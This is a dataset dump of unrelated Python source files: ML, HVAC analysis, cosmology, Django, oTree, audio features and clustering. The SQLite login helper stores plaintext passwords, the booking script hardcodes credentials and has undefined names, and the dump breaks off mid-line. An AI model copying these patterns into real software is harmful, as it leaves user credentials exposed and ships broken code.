dim=1)\r\n scale[mask] = self.eps\r\n eta *= self.eps / scale.view(-1, 1, 1, 1)\r\n images.data = torch.clamp(ori_images + eta, min=0, max=1)\r\n return images.detach().clone()","sub_path":"PGD.py","file_name":"PGD.py","file_ext":"py","file_size_in_byte":4377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"170603136","text":"import sqlite3 as sql\nfrom sqlite3.dbapi2 import Cursor\n\ndef add_data(nome, sobrenome, login, senha, email):\n banco = sql.connect('db.db')\n\n cursor = banco.cursor()\n \n cursor.execute(\"\"\"\n INSERT INTO conta (nome, sobrenome, login, senha, email) \n VALUES(?, ?, ?, ?, ?)\n \"\"\", (nome, sobrenome, login, senha, email))\n banco.commit()\n banco.close()\n\ndef get_senha(login):\n banco = sql.connect('db.db')\n\n cursor = banco.cursor()\n\n cursor.execute('SELECT senha FROM conta WHERE login = ?', (login,) )\n retornar = cursor.fetchall()\n banco.commit()\n banco.close()\n print(retornar)\n \n\n\n return retornar[0][0] if retornar else retornar\n\ndef login_in_data(login):\n # retorna true se tem, false se nao tem\n banco = sql.connect('db.db')\n\n cursor = banco.cursor()\n\n cursor.execute('SELECT login FROM conta WHERE login = ?', (login,) )\n retornar = cursor.fetchall()\n banco.commit()\n banco.close()\n\n print(retornar)\n \n return True if retornar else False\ndef update_msg(login, msg):\n banco = sql.connect('db.db')\n cursor = banco.cursor()\n\n cursor.execute('''\n UPDATE conta\n SET frase = ?\n WHERE login = ?\n\n ''', (msg, login))\n \n banco.commit()\n banco.close()\ndef get_msg(login):\n banco = sql.connect('db.db')\n\n cursor = banco.cursor()\n\n cursor.execute('SELECT frase FROM conta WHERE login = ?', (login, ))\n retornar = cursor.fetchall()[0][0]\n banco.commit()\n banco.close()\n print(retornar)\n return retornar\n \n\n\ndef mostrar():\n banco = sql.connect('db.db')\n\n cursor = banco.cursor()\n\n cursor.execute('SELECT * FROM conta')\n retornar = cursor.fetchall()\n banco.commit()\n banco.close()\n print(retornar)\n\n\nif __name__ == '__main__':\n mostrar()\n # add_data(nome='jonas3', sobrenome='teixeira', login='jonas3', senha='123', email='jonas@email.com')\n mostrar()\n print()\n # get_senha('jonas')\n # print(login_in_data('jonas'))\n # update_msg('jonas', 'esta eh uma mensagem')\n # print('=-=-=-=')\n # get_msg('jonas')\n # mostrar()\n print(get_senha('as'))","sub_path":"18-sistemaDeLogin-emDev/testes/uteis.py","file_name":"uteis.py","file_ext":"py","file_size_in_byte":2225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"189605750","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"Scripts used to perform fault impact case studies.\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\ntry:\n import simplejson as json\nexcept ImportError:\n import json\n\nimport load_data\nimport munge\n\nCONFIG = json.load(open('./data_model.json', 'r'))\n\n\ndef main(frame):\n \"\"\"Perform a case study for condenser and evaporator fouling service.\"\"\"\n\n # Study the impacts of simultaneous evaporator and condenser faults.\n df = munge.find_system(frame, MUL_MDOT=1.0, MUL_COND_VOL=1.3)\n\n # To avoid impacts of other faults, select data with other faults at\n # normal levels using a query.\n norm_lvls = CONFIG['Normal_Levels'].copy()\n # We don't want normal evaporator and condenser volume, so pop these.\n norm_lvls.pop('ODHX_AIR_FOUL_LVL')\n norm_lvls.pop('IDHX_AIR_FOUL_LVL')\n qry_str = ' & '.join(['{} == {}'.format(*i) for i in norm_lvls.items()])\n df = df.query(qry_str)\n\n # Modify fault impact ratios according to the seasonal impact.\n faults = ['ODHX_AIR_FOUL_LVL', 'IDHX_AIR_FOUL_LVL']\n impacts = ['R_COOL', 'R_SHR', 'R_COP', 'R_RUN', 'R_WORK', ]\n df = df.assign(R_COOL=df.R_COOL * df.SEAS_WT,\n R_SHR=df.R_SHR * df.SEAS_WT,\n R_COP=df.R_COP * df.SEAS_WT,\n R_RUN=df.R_RUN * df.SEAS_WT,\n R_WORK=df.R_WORK * df.SEAS_WT, )\n\n # TODO Multiply result by 0.5 since duplicate rows not handled correctly.\n df = df.groupby(by=faults)[impacts].aggregate(lambda x: 0.5 * np.nansum(x))\n\n return df\n\n\ndef plot_2d_impacts(df):\n\n dx, dy = 10., 10.\n y, x = np.mgrid[slice(0., 50. + dy, dy),\n slice(0., 50. + dx, dx)]\n z = 2. * df.R_WORK.values.reshape(y.shape[0], x.shape[1])\n\n with plt.style.context(('./academic.mplstyle')):\n fig = plt.gcf()\n axs = plt.gca()\n fig.set_size_inches(4, 3)\n plt.contourf(x, y, z, cmap=plt.get_cmap('Reds'),\n vmin=1.0, vmax=1.8)\n cb = plt.colorbar()\n plt.xlim((-2, 52))\n plt.ylim((-2, 52))\n plt.xlabel(r\"Evaporator Air Flow Reduction [\\%]\")\n plt.ylabel(r\"Condenser Air Flow Reduction [\\%]\")\n cb.set_label(r\"Energy Impact [\\%]\")\n cb.solids.set_edgecolor('face')\n cb.set_clim((1.0, 1.8))\n plt.scatter(50., 29.73, 30, c='k')\n plt.scatter(0., 29.73, 30, c='w')\n plt.scatter(50., 0., 30, c='w')\n plt.arrow(48, 29.73, -44, 0, width=0.05, fc='k')\n plt.text(25., 35, r\"Clean Evaporator:\",\n ha='center', va='bottom', fontsize=9)\n plt.text(25., 31, r\"Benefit $=$35.6\\%\",\n ha='center', va='bottom', fontsize=9)\n plt.arrow(50, 27.73, 0, -23., width=0.05, fc='k')\n plt.text(48., 17, r\"Clean Condenser:\",\n ha='right', va='center', fontsize=9)\n plt.text(48., 13, r\"Benefit $=$ 15.3\\%\",\n ha='right', va='center', fontsize=9)\n plt.savefig('./impact_contourf_plot.pdf')\n plt.savefig('./impact_contourf_plot.png', dpi=212)\n plt.close('all')\n\n\ndef plot_seas_hist():\n\n mia = load_data.load_tmy_data(722020)\n bins = np.arange(65., 135., 5.)\n\n degF = 1.8 * mia['Dry-bulb (C)'] + 32.\n\n with plt.style.context(('./academic.mplstyle')):\n degF.hist(bins=bins, figsize=(4., 3.), label='Miami TMY')\n fig = plt.gcf()\n axs = plt.gca()\n ax2 = axs.twinx()\n ax2.plot((65., 95.), (0., 1.), 'k-')\n axs.set_xlim((65., 110.))\n axs.set_xlabel('Ambient Temperature [$^\\circ$F]')\n axs.set_ylabel('Number of Hours')\n ax2.set_ylabel('Load Fraction [-]')\n axs.legend(loc='upper left')\n fig.savefig('./seas_hist_plot.pdf')\n fig.savefig('./seas_hist_plot.png', dpi=212)\n plt.close('all')\n\n\ndef calc_seas_cost(frame, tmy):\n\n elec_cost = 1.461 * 0.11 # correcting for larger compressor\n quip_cost = 0.285\n\n bins = np.arange(67.5, 112.5, 5.)\n hour = np.array((778., 1327., 2511., 2312., 838., 54., 6., 0., 0.))\n load = np.array([min(1., (x - 65.) / (95. - 65.)) for x in bins])\n\n system = {'MUL_MDOT': 1., 'MUL_COND_VOL': 1.3}\n norm = munge.find_normal(munge.find_system(frame, **system))\n\n power = ['COMP_ELEC_IN_PWR', 'ODF_ELEC_IN_PWR', 'IDF_ELEC_IN_PWR']\n norm_energy = 0.001 * sum(hour * load * norm[power].sum(axis=1).iloc[:9])\n norm_run = sum(hour * load)\n print('{:6.2f} kWh, {:6.2f} h'.format(norm_energy, norm_run))\n print('${:6.2f}, ${:6.2f} h'.format(elec_cost * norm_energy,\n quip_cost * norm_run))\n\n # Case 0: Condenser Fault: 30%, Evaporator Fault: 50%\n case_0 = munge.find_fault_scenario(munge.find_system(frame, **system),\n 100., 30., 50., 0., 0., 0.)\n case_0_energy = \\\n 0.001 * sum(hour * load * norm[power].sum(axis=1).iloc[:9].values *\n case_0.R_WORK.iloc[:9].values)\n case_0_run = \\\n sum(hour * load * case_0.R_RUN.iloc[:9])\n print('{:6.2f} kWh, {:6.2f} h'.format(case_0_energy, case_0_run))\n print('${:6.2f}, ${:6.2f}'.format(elec_cost * (case_0_energy - norm_energy),\n quip_cost * (case_0_run - norm_run)))\n\n # Case 1: Condenser Fault: 0%, Evaporator Fault: 50%\n case_1 = munge.find_fault_scenario(munge.find_system(frame, **system),\n IDHX_AIR_FOUL_LVL=50.)\n case_1_energy = \\\n 0.001 * sum(hour * load * norm[power].sum(axis=1).iloc[:9].values *\n case_1.R_WORK.iloc[:9].values)\n case_1_run = \\\n sum(hour * load * case_1.R_RUN.iloc[:9])\n print('{:6.2f} kWh, {:6.2f} h'.format(case_1_energy, case_1_run))\n print('${:6.2f}, ${:6.2f}'.format(elec_cost * (case_1_energy - norm_energy),\n quip_cost * (case_1_run - norm_run)))\n\n # Case 2: Condenser Fault: 30%, Evaporator Fault: 0%\n case_2 = munge.find_fault_scenario(munge.find_system(frame, **system),\n ODHX_AIR_FOUL_LVL=30.)\n case_2_energy = \\\n 0.001 * sum(hour * load * norm[power].sum(axis=1).iloc[:9].values *\n case_2.R_WORK.iloc[:9].values)\n case_2_run = \\\n sum(hour * load * case_2.R_RUN.iloc[:9])\n print('{:6.2f} kWh, {:6.2f} h'.format(case_2_energy, case_2_run))\n print('${:6.2f}, ${:6.2f}'.format(elec_cost * (case_2_energy - norm_energy),\n quip_cost * (case_2_run - norm_run)))\n\n return bins, hour, load, norm\n\n\nif __name__ == '__main__':\n\n from load_data import load_data_store\n from process import calculate_impacts, assign_seasonal_weight\n\n data_path = '/home/andrew/data/fault_sim_v25/'\n try:\n store = load_data_store(data_path, use_xlsx=False)\n frame = store.SHEN_PKGD_3TON_FXO_R410A.copy()\n frame = assign_seasonal_weight(calculate_impacts(frame))\n print(main(frame))\n except Exception as e:\n print(\"Terminated with error: {}\".format(e))\n finally:\n store.close()\n","sub_path":"fault_sim_analysis/case_study.py","file_name":"case_study.py","file_ext":"py","file_size_in_byte":7095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"14312450","text":"from cosmosis.datablock import names, option_section\nimport os\nimport numpy as np\n\n\ndirname = os.path.split(__file__)[0]\n\n\ndef setup(options):\n mass = options[option_section, \"mass\"]\n if mass not in ['low', 'high']:\n raise ValueError(\"Please choose low or high mass for Jullo likelihood\")\n data = np.loadtxt(os.path.join(dirname, \"jullo_data.txt\")).T\n if mass == \"low\":\n data = data[0], data[1], data[2]\n else:\n data = data[0], data[3], data[4]\n return data, mass\n\n\ndef execute(block, config):\n data, mass = config\n z_obs, b_obs, sigma_obs = data\n # Load the bias from the block\n try:\n z = block[names.bias_field, \"z\"]\n except:\n raise ValueError(\n \"The Jullo data requires bias as a function of redshift\")\n b = block[names.bias_field, \"b\"]\n\n # Just use smallest k value for 2D\n if b.ndim == 2:\n k, z, b = block.get_grid(names.bias_field, \"k_h\", \"z\", \"b\")\n b = b[0]\n\n # interpolate into it at the data z\n b_theory = np.interp(z_obs, z, b)\n\n # get likelihood\n chi2 = ((b_theory - b_obs)**2 / sigma_obs**2).sum()\n like = -0.5 * chi2\n block[names.likelihoods, \"jullo_like\"] = like\n\n return 0\n\n\ndef cleanup(config):\n pass\n","sub_path":"cosmosis-standard-library/likelihood/jullo_bias/jullo.py","file_name":"jullo.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"350539487","text":"from ._builtin import Page, WaitPage\r\nfrom otree.api import Currency as c, currency_range\r\nfrom .models import Constants\r\n\r\n\r\nclass Results(Page):\r\n \"\"\"Players payoff: How much each has earned\"\"\"\r\n def vars_for_template(self):\r\n # Set payoffs\r\n self.player.random_payoffs()\r\n # Display\r\n participant = self.participant\r\n session = self.session\r\n player = self.player\r\n return {\r\n 'Color1': session.vars['Color1'],\r\n\r\n 'Contribution1': participant.vars['Contribution1'],\r\n 'Total_contribution1': session.vars['Total_contribution1'],\r\n 'UrnB1': session.vars['UrnB1'],\r\n 'UrnA1': participant.vars['UrnA1'],\r\n 'Initial1': session.vars['Initial1'],\r\n 'Total1': participant.vars['Total1'],\r\n 'Autre_contribution1': session.vars['Total_contribution1'] - participant.vars['Contribution1'],\r\n\r\n 'Contribution2' : participant.vars['Contribution2'],\r\n 'Total_contribution2' : session.vars['Total_contribution2'],\r\n 'UrnB2' : session.vars['UrnB2'],\r\n 'UrnA2' : participant.vars['UrnA2'],\r\n 'Initial2' : session.vars['Initial2'],\r\n 'Total2' : participant.vars['Total2'],\r\n 'Autre_contribution2' : session.vars['Total_contribution2'] - participant.vars['Contribution2'],\r\n\r\n 'Proba_1' : participant.vars['proba_1'],\r\n 'Proba_2' : participant.vars['proba_2'],\r\n 'Choix_player_ligne' : participant.vars['choix_player_ligne'],\r\n 'Realisation_Holt_Laury' : participant.vars['realisation_Holt_Laury'][0],\r\n\r\n }\r\n\r\n\r\n\r\n\r\nclass PaymentInfo(Page):\r\n\r\n def vars_for_template(self):\r\n participant = self.participant\r\n return {\r\n 'redemption_code': participant.label or participant.code,\r\n }\r\n\r\n\r\npage_sequence = [#Results,\r\n PaymentInfo]\r\n","sub_path":"Mturk/payment_info_1/pages.py","file_name":"pages.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"54695178","text":"import datetime\n\nfrom django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required\n\nfrom .models import WorkDay\n\n\n@login_required\ndef show_log(request):\n now = datetime.datetime.now()\n if request.method == 'POST':\n if request.POST['action'] == 'start':\n if not WorkDay.objects.filter(startTime__date=now.date()):\n new_day = WorkDay.objects.create(startTime=now,\n user=request.user)\n\n if request.method == 'POST':\n if request.POST['action'] == 'finish':\n if WorkDay.objects.filter(startTime__date=now.date(),\n user=request.user):\n new_day = WorkDay.objects.get(startTime__date=now.date(),\n user=request.user)\n new_day.finishTime = now\n new_day.save()\n\n work_days = WorkDay.objects.filter(\n user=request.user\n ).filter(startTime__year=now.year,\n startTime__month=now.month).order_by('startTime')\n\n days_finished = [day for day in work_days if day.finishTime]\n seconds_should = 32400 * len(days_finished)\n seconds_worked = sum(WorkDay.workday_in_seconds for WorkDay in days_finished)\n seconds_diff = seconds_worked - seconds_should\n if seconds_diff >= 0:\n readable_total = '+{}'.format(str(datetime.timedelta(seconds=seconds_diff))[:4])\n else:\n readable_total = '-{}'.format(str(datetime.timedelta(seconds=abs(seconds_diff)))[:4])\n context = {\n 'now': now,\n 'work_days': work_days,\n 'readable_total': readable_total\n }\n return render(request, 'show-log.html', context)\n\n\n@login_required\ndef index(request):\n return render(request, 'index.html')\n","sub_path":"worklog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"207361280","text":"import datetime\n\nimport pytest\n\nfrom essentials_kit_management.storages.form_storage_implementation import \\\n FormStorageImplementation\n\nfrom essentials_kit_management.interactors.storages.dtos import (\n GetFormItemDtoWithSectionId, GetFormBrandDtoWithItemId\n )\n\n\n@pytest.mark.django_db\ndef test_get_brand_dtos_with_valid_details_return_dtos(populate_data):\n\n # Arrange\n item_dtos = [\n GetFormItemDtoWithSectionId(\n item_id=1,\n name=\"item1\",\n description=\"item1\",\n section_id=1),\n GetFormItemDtoWithSectionId(\n item_id=2,\n name=\"item2\",\n description=\"item2\",\n section_id=1)]\n\n expected_brand_dtos = [\n GetFormBrandDtoWithItemId(\n brand_id=1,\n name=\"brand1\",\n min_quantity=1,\n max_quantity=5,\n price_per_item=100,\n item_id=1),\n GetFormBrandDtoWithItemId(\n brand_id=2,\n name=\"brand2\",\n min_quantity=2,\n max_quantity=8,\n price_per_item=200,\n item_id=1),\n GetFormBrandDtoWithItemId(\n brand_id=3,\n name=\"brand3\",\n min_quantity=3,\n max_quantity=9,\n price_per_item=300,\n item_id=2)\n ]\n\n storage = FormStorageImplementation()\n\n # Act\n actual_brand_dtos = storage.get_brand_dtos(item_dtos=item_dtos)\n\n # Assert\n assert actual_brand_dtos == expected_brand_dtos\n","sub_path":"essentials_kit_management/tests/storages/test_get_brand_dtos.py","file_name":"test_get_brand_dtos.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"177418537","text":"# -*- coding: utf-8 -*-\n\n# 提取特征\nimport librosa\nfrom Vad import Vad\nimport numpy as np\n\nclass Feature(object):\n\n def __init__(self, filename):\n self.filename = filename\n \n def getFeature(self):\n #端点检测\n vad = Vad(self.filename)\n newVoice = vad.getNewVoice()\n \n y, sr = librosa.load(newVoice)\n #获取mfcc\n ccc = librosa.feature.mfcc(y=y, sr=sr)\n #获取ccc最大特征值对应特征向量\n A = np.mat(ccc)\n B = A * A.T;\n a,b=np.linalg.eig(B)\n m = np.argmax(a);\n \n ccc1 = np.array(b[m].tolist()[0])\n \n #能量构造\n #S, phase = librosa.magphase(librosa.stft(y))\n S = librosa.magphase(librosa.stft(y, window=np.ones, center=False))[0]\n rms = librosa.feature.rmse(S=S)\n rms_max = np.max(rms[0])\n rms_min = np.min(rms[0])\n rms_mean = np.mean(rms[0])\n rms_std = np.std(rms[0])\n \n #过零率\n rate = librosa.feature.zero_crossing_rate(y)\n rete_max = np.max(rate)\n rate_mean = np.mean(rate)\n rate_std = np.std(rate)\n \n# =============================================================================\n# S = np.abs(librosa.stft(y))\n# chroma = librosa.feature.chroma_stft(S=S, sr=sr)\n# A = np.mat(chroma)\n# B = A * A.T\n# a,b=np.linalg.eig(B)\n# m = np.argmax(a);\n# chroma1 = np.array(b[m].tolist()[0])\n# =============================================================================\n \n # pitch = Pitch(newVoice, sr)\n # pitches = np.array(pitch.getPitch())\n # pitch_max = np.max(pitches)\n # pitch_mean = np.mean(pitches)\n # pitch_std = np.std(pitches)\n # result3 = np.array([pitch_max, pitch_mean, pitch_std])\n\n\n # melEnergy = MelEnergy(newVoice)\n # melEnergys = melEnergy.getMelEnergy()\n\n e = librosa.estimate_tuning(y=y, sr=sr)\n\n # mel = librosa.feature.melspectrogram(y=y, sr=sr)\n # A = np.mat(mel)\n # B = A * A.T;\n # a, b = np.linalg.eig(B)\n # m = np.argmax(a);\n # mel1 = np.array(b[m].tolist()[0])\n\n # odf = librosa.onset.onset_strength(y=y, sr=sr, hop_length=512)\n # ac = librosa.autocorrelate(odf, max_size=4 * sr / 512)\n # ac_min = np.min(ac)\n # ac_max = np.max(ac)\n # ac_mean = np.mean(ac)\n # ac_std = np.std(ac)\n\n result1 = np.array([e, rms_max,rms_min,rms_mean,rms_std,rete_max,rate_mean,rate_std])\n result2 = ccc1\n #result3 = melEnergys\n result = np.append(result1,result2)\n # result = np.append(result,mel1)\n return result\n \n \n \n \n \n","sub_path":"src/com/module/recognition/pythonCode/Feature.py","file_name":"Feature.py","file_ext":"py","file_size_in_byte":2764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"380469553","text":"# coding: utf-8\nimport logging\nfrom contextlib import contextmanager\n\nfrom aleph.core import get_graph\nfrom aleph.graph.schema import NodeType\nfrom aleph.graph.entities import load_entities, load_entity, remove_entity # noqa\nfrom aleph.graph.collections import load_collection, remove_collection # noqa\nfrom aleph.graph.documents import load_documents, load_document, remove_document # noqa\nfrom aleph.graph.mapping import Mapping # noqa\n\nlog = logging.getLogger(__name__)\n\n\ndef upgrade_graph():\n graph = get_graph()\n if graph is None:\n return\n # graph.delete_all()\n cur = graph.run(\"MATCH (n) WHERE NOT (n)--() DELETE n;\")\n log.debug(\"Deleted %(nodes_deleted)s orphan nodes.\", cur.stats())\n\n for node_type in NodeType.all():\n node_type.ensure_indices(graph)\n\n\n@contextmanager\ndef transaction():\n graph = get_graph()\n if graph is None:\n yield None\n else:\n # this produces deadlocks en masse:\n # tx = graph.begin()\n # yield tx\n # tx.commit()\n yield graph\n\n\ndef test():\n from aleph.model import Entity\n graph = get_graph()\n tx = graph.begin()\n for entity_id in Entity.all_ids():\n remove_entity(tx, entity_id)\n tx.commit()\n\n # # from py2neo.database.cypher import cypher_repr\n # graph = get_graph()\n # collections = range(1, 100)\n # collections = [251]\n # # collections = cypher_repr(collections)\n # # print cypher_repr(u\"huhu this has ' quotäää\")\n # # return\n # q = \"MATCH (n:Entity)-[r]-(d:Document) \" \\\n # \"MATCH (n)-[:PART_OF]->(c1:Collection) \" \\\n # \"MATCH (d)-[:PART_OF]->(c2:Collection) \" \\\n # \"WHERE c1.alephCollection IN {acl} \" \\\n # \"AND c2.alephCollection IN {acl} \" \\\n # \"RETURN n, r, d LIMIT 5 \"\n # # q = q % (collections, collections)\n # for res in graph.data(q, acl=collections):\n # print dir(res.get('r'))\n # print res.get('r').__uuid__\n # # graph.delete_all()\n","sub_path":"aleph/graph/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"17117487","text":"from django.conf.urls import url, include\n\nfrom rest_framework import routers\n\nfrom .views import MerchantViewSet, list_merchants, list_status, export\n\nrouter = routers.DefaultRouter()\nrouter.register(r'', MerchantViewSet, 'Merchant')\n\nurlpatterns = [\n url(r'^', include(router.urls), name='Restful API Merchant'),\n url(r'^list', list_merchants, name='get_list_merchants'),\n url(r'^status', list_status, name='get_list_status'),\n url(r'^export', export, name='export_data_merchant'),\n]\n","sub_path":"sale_portal/merchant/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"497450697","text":"from typing import List\nimport numpy as np\nfrom scipy.special import softmax\n\n\ndef NBC(population):\n \"\"\"Returns SEEDS ONLY\"\"\"\n n = len(population)\n if n == 1:\n return population\n\n mem = [[None]*n for _ in range(n)]\n\n def dist(i, j) -> float:\n if mem[i][j] is not None:\n return mem[i][j]\n x = p[i]\n y = p[j]\n t = np.sum(((x.val-y.val)**2))**.5\n mem[i][j] = t\n mem[j][i] = t\n return t\n\n p = sorted(population) # better to worse, reverse lt\n edges = []\n for i in range(1, n):\n # ans = i\n # maxyet=0\n # for j in range(0,i):\n # t = np.sum(((p[i].val-p[j].val)**2))\n # if (t phi * mu)\n\n return seeds\n\n\ndef permute_softmax(edges, edge_lengths, temp=1):\n soft = softmax(edge_lengths*temp)\n print(edge_lengths)\n assert (np.min(soft) > 0)\n\n permutation = np.random.choice(\n len(edges), len(edges), replace=False, p=soft)\n\n return [edges[i] for i in permutation]\n\n\ndef permute_softmax2(edges, edge_lengths, temp=1):\n\n ans = []\n\n while edges:\n\n soft = softmax(edge_lengths*temp)\n\n index = np.random.choice(\n len(edges), 1, replace=False, p=soft)[0]\n\n ans.append(edges[index])\n del edges[index]\n edge_lengths = np.delete(edge_lengths, index)\n\n return ans\n\n\ndef permute_softmax3(edges, edge_lengths, temp=1):\n ans = []\n count = 0\n\n while edges:\n\n soft = softmax(edge_lengths*temp)\n num_indices = len(edges) - np.sum(soft == 0)\n\n indices = np.random.choice(\n len(edges), num_indices, replace=False, p=soft)\n\n for i in indices:\n ans.append(edges[i])\n for index in sorted(indices, reverse=True):\n del(edges[index])\n edge_lengths = np.delete(edge_lengths, indices)\n\n # print(count)\n # count += 1\n\n return ans\n\n\ndef NBC_minsize(population, minsize, temp=-1, phi=1,num_clusters=float(\"inf\")): # phi = 1 MAGIC numbers\n p = sorted(population) # better to worse, reverse lt\n n = len(p)\n\n if (n == 1):\n return [population]\n\n mem = {}\n\n def dist(i, j) -> float:\n if (i, j) in mem:\n return mem[(i, j)]\n if (j, i) in mem:\n return mem[(j, i)]\n x = p[i]\n y = p[j]\n t = np.sum(((x.val-y.val)**2))**.5\n mem[(j, i)] = t\n return t\n\n ans = {i: [] for i in range(0, n)}\n for i in range(1, n):\n t = min(range(0, i), key=lambda j: dist(i, j))\n ans[t].append(i)\n\n parent = [-1]*n\n edges = []\n for i in ans:\n for j in ans[i]: # i is better, arrow points upwards,child up parent\n parent[j] = i\n edges.append((i, j))\n\n mu = sum(dist(p, c) for p, c in edges)/len(edges)\n\n fol = {}\n\n def follow(node):\n if node not in fol:\n if node in ans:\n fol[node] = 1 + sum(follow(i) for i in ans[node])\n else:\n fol[node] = 1\n return fol[node]\n\n if phi!=0:\n edges = [e for e in edges if dist(e[0], e[1]) > phi * mu] # adding counter\n edge_lengths = np.array([dist(e[0], e[1]) for e in edges])\n # assert (np.min(edge_lengths) > 0)\n # max_len = np.max(edge_lengths)\n # edges = permute_softmax3(edges, edge_lengths, temp=temp)\n\n if (temp != -1):\n edges = permute_softmax3(edges, edge_lengths, temp=temp)\n else:\n edges.sort(key=lambda x: dist(x[0], x[1]), reverse=True)\n\n # if (temp==100000):# confirm\n # print(\"Normal\",edges)\n # print(\"Inf\",sorted(edges,key=lambda x: dist(x[0], x[1]), reverse=True))\n\n # if (dist(edges[0][0], edges[0][1]) == max_len):\n # print(\"good\")\n # else:\n # print(\"bad\")\n\n # edges.sort(key=lambda x: dist(x[0], x[1]), reverse=True)\n\n counter = 1\n\n for e in edges:\n if(counter >= num_clusters):\n break\n\n if follow(e[1]) >= minsize:\n t = e[0]\n while parent[t] != -1:\n t = parent[t]\n if follow(t) - follow(e[1]) >= minsize:\n counter += 1\n ans[e[0]].remove(e[1])\n parent[e[1]] = - 1\n t = e[0]\n while parent[t] != -1:\n fol[t] -= follow(e[1])\n t = parent[t]\n\n def rec(node, homies):\n homies.append(node)\n if node in ans:\n for i in ans[node]:\n rec(i, homies)\n\n species = []\n for s in range(n):\n if parent[s] == -1: # if i is a seed\n l = []\n rec(s, l)\n species.append(l)\n\n species = [[p[j] for j in i] for i in species]\n return species\n","sub_path":"nbc.py","file_name":"nbc.py","file_ext":"py","file_size_in_byte":5032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"377601992","text":"import os\r\nimport datetime\r\nimport time\r\nimport re\r\n\r\nglobal storedUsername\r\nstoredUsername = \"1\"\r\nglobal storedPassword\r\nstoredPassword = \"1\"\r\n\r\ndef welcome():\r\n print(\"Select an option from the menu: \")\r\n print(\"1 - Login\")\r\n print(\"2 - Exit\")\r\n\r\n option = input()\r\n\r\n if option == \"1\":\r\n login()\r\n elif option == \"2\":\r\n exit()\r\n else:\r\n print(\"please select a valid option\")\r\n welcome()\r\n\r\n#LOGIN\r\n#LOGIN\r\n#LOGIN\r\n\r\ndef login():\r\n print (\"Welcome, please login\")\r\n print (\"Enter your Username\")\r\n username = str(input())\r\n if username == storedUsername:\r\n print (\"Username correct, enter password\")\r\n password = str(input())\r\n if password == storedPassword:\r\n print (\"Password correct\")\r\n menu()\r\n else:\r\n print(\"incorrect. login again.\")\r\n login()\r\n\r\n else:\r\n print (\"Your username doesnt match our database, try again\")\r\n login()\r\n\r\n\r\n#BOOKING - MAIN\r\n#BOOKING - MAIN\r\n#BOOKING - MAIN\r\n\r\ndef menu():\r\n print(\"Select an option from the menu: \")\r\n print(\"1 - Enter Details\")\r\n print(\"2 - Enter Food\")\r\n print(\"3 - Exit\")\r\n \r\n option = input()\r\n\r\n if option == \"1\":\r\n createBooking()\r\n elif option == \"2\":\r\n food()\r\n elif option == \"3\":\r\n exit()\r\n else:\r\n print(\"please select a valid option\")\r\n welcome()\r\n \r\n\r\ndef createBooking():\r\n #Create text file\r\n bookingCounter = 1\r\n while os.path.exists(\"booking%s.txt\" % bookingCounter):\r\n bookingCounter += 1\r\n\r\n #Enter Details:\r\n\r\n f = open(\"booking%s.txt\" % bookingCounter, \"w\")\r\n \r\n print (\"Enter customer details\")\r\n print (\"Please enter details: \")\r\n\r\n day = input(\"Enter date of arrival. (DD/MM/YYYY)\")\r\n dateValidation()\r\n f.write(\"Day of arrival: \" + day + \"\\n\")\r\n\r\n \r\n timea = input(\"Enter time of arrival\")\r\n timeVailidation(timea)\r\n f.write(\"Time of arrival: \" + timea + \"\\n\")\r\n\r\n\r\n timed = input(\"Enter time of departure\")\r\n timeValidation(timed)\r\n f.write(\"Time of departure: \" + timed + \"\\n\")\r\n\r\n\r\n customerName = input(\"Enter name\")\r\n f.write(\"Customer Name: \" + customerName + \"\\n\")\r\n\r\n \r\n email = input(\"Enter email\")\r\n while answer == False:\r\n if isValidEmail(email) == True :\r\n f.write(\"Customer Email: \" + email + \"\\n\")\r\n answer == True\r\n else:\r\n print (\"This is not a valid email address\")\r\n\r\n\r\n groupName = input(\"Enter group, party, school name\")\r\n f.write(\"Group, party, school name: \" + groupName + \"\\n\")\r\n\r\n \r\n address = input(\"Enter address\")\r\n f.write(\"Address: \" + address + \"\\n\")\r\n\r\n \r\n postcode = input(\"Enter postcode\")\r\n f.write(\"postcode: \" + postcode + \"\\n\")\r\n\r\n \r\n contactNumber = input(\"Enter contact number\")\r\n f.write(\"Contact Number: \" + contactNumber + \"\\n\" + \"\\n\")\r\n\r\n\r\n\r\n \r\n print (\"Enter group details\")\r\n print (\"Please enter details: \")\r\n \r\n adults = input(\"Enter number of adults\")\r\n f.write(\"Number of adults: \" + adults + \"\\n\")\r\n\r\n \r\n under18 = input(\"Enter number of children under 18\")\r\n f.write(\"Number of under 18's: \" + under18 + \"\\n\" + \"\\n\")\r\n\r\n\r\n \r\n \r\n print (\"Food Orders: \")\r\n \r\n burger = input(\"Regular beef burger, fries and drink\" + \"\\n\" + \"Enter quantity: \")\r\n f.write(\"Number of burgers: \" + burger + \"\\n\")\r\n\r\n \r\n chicken = input(\"Chicken Wrap, drink\" + \"\\n\" + \"Enter quantity: \")\r\n f.write(\"Number of chicken: \" + chicken + \"\\n\")\r\n\r\n \r\n chilli = input(\"Chilli con carne, drink\" + \"\\n\" + \"Enter quantity: \")\r\n f.write(\"Number of chilli: \" + chilli + 